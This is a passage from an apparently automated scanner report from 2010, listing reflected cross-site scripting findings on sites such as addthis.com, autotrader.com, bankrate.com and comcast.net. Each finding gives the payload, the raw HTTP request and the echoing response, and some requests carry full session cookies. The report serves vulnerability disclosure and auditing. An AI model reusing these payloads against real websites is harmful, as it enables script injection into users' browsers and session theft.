Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e40a5"-alert(1)-"c1edf7a2e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/e40a5"-alert(1)-"c1edf7a2e70 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 91760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/e40a5"-alert(1)-"c1edf7a2e70";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19533"%3balert(1)//bdc50d644ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19533";alert(1)//bdc50d644ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?19533"%3balert(1)//bdc50d644ac=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:29 GMT
Server: Apache
Set-Cookie: v1st=B6DE3D485BDE3E45; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=174.121.222.18.1292783429221107; path=/; expires=Fri, 28-Nov-14 18:30:29 GMT; domain=.autotrader.com
Set-Cookie: JSESSIONID=658315DCED88B718A593EBD8446E3348; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Mon, 26-Dec-2011 18:30:29 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3895617034.61475.0000; path=/
Content-Length: 58070


<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
BIRFPageData = {
pg_inst:"797433936860309222",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"19533";alert(1)//bdc50d644ac":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /compare-rates.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e52be"style="x:expression(alert(1))"0d77ae31848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /compare-rates.aspx?e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/compare-rates.aspx?e52be"style="x:expression(alert(1))"0d77ae31848=1" />
...[SNIP]...

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dac"style%3d"x%3aexpression(alert(1))"881260241e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7dac"style="x:expression(alert(1))"881260241e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style%3d"x%3aexpression(alert(1))"881260241e5=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style="x:expression(alert(1))"881260241e5=1" />
...[SNIP]...

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-eonline/20101219/b217076/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830 was submitted in the REST URL parameter 2. This input was echoed as 5ba35<img src=a onerror=alert(1)>f7f7658c830 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-eonline5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830/20101219/b217076/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:17 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'eonline5ba35<img src=a onerror=alert(1)>f7f7658c830'</h2>
...[SNIP]...

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-movies/20101217/US.People.Randy.Quaid/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562 was submitted in the REST URL parameter 2. This input was echoed as 3514c<img src=a onerror=alert(1)>4bfe6550562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-movies3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562/20101217/US.People.Randy.Quaid/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:19 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'movies3514c<img src=a onerror=alert(1)>4bfe6550562'</h2>
...[SNIP]...

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20090708/entertainment.slideshows.001/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146 was submitted in the REST URL parameter 2. This input was echoed as 7f023<img src=a onerror=alert(1)>cfb7aba146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146/20090708/entertainment.slideshows.001/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment7f023<img src=a onerror=alert(1)>cfb7aba146' subchannel'home'</h2>
...[SNIP]...

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037 was submitted in the REST URL parameter 2. This input was echoed as 1c9ac<img src=a onerror=alert(1)>8179713037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037/20101219/AS.Fiji.Oprah.Winfrey/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment1c9ac<img src=a onerror=alert(1)>8179713037' subchannel'home'</h2>
...[SNIP]...

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699 was submitted in the REST URL parameter 2. This input was echoed as 9b8ac<img src=a onerror=alert(1)>b442b71f699 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-boxing9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'boxing9b8ac<img src=a onerror=alert(1)>b442b71f699'</h2>
...[SNIP]...

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67ef'%3bfefd803c823 was submitted in the REST URL parameter 2. This input was echoed as f67ef';fefd803c823 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxingf67ef'%3bfefd803c823/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
/', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/boxingf67ef';fefd803c823/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a02"%3bc6b15b7f637 was submitted in the REST URL parameter 2. This input was echoed as e2a02";c6b15b7f637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxinge2a02"%3bc6b15b7f637/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
sAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/boxinge2a02";c6b15b7f637/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30dd3"%3b57c65471a56 was submitted in the REST URL parameter 2. This input was echoed as 30dd3";57c65471a56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbk30dd3"%3b57c65471a56/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/cbk30dd3";57c65471a56/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da67d'%3bde5beb5d510 was submitted in the REST URL parameter 2. This input was echoed as da67d';de5beb5d510 in the application's response.

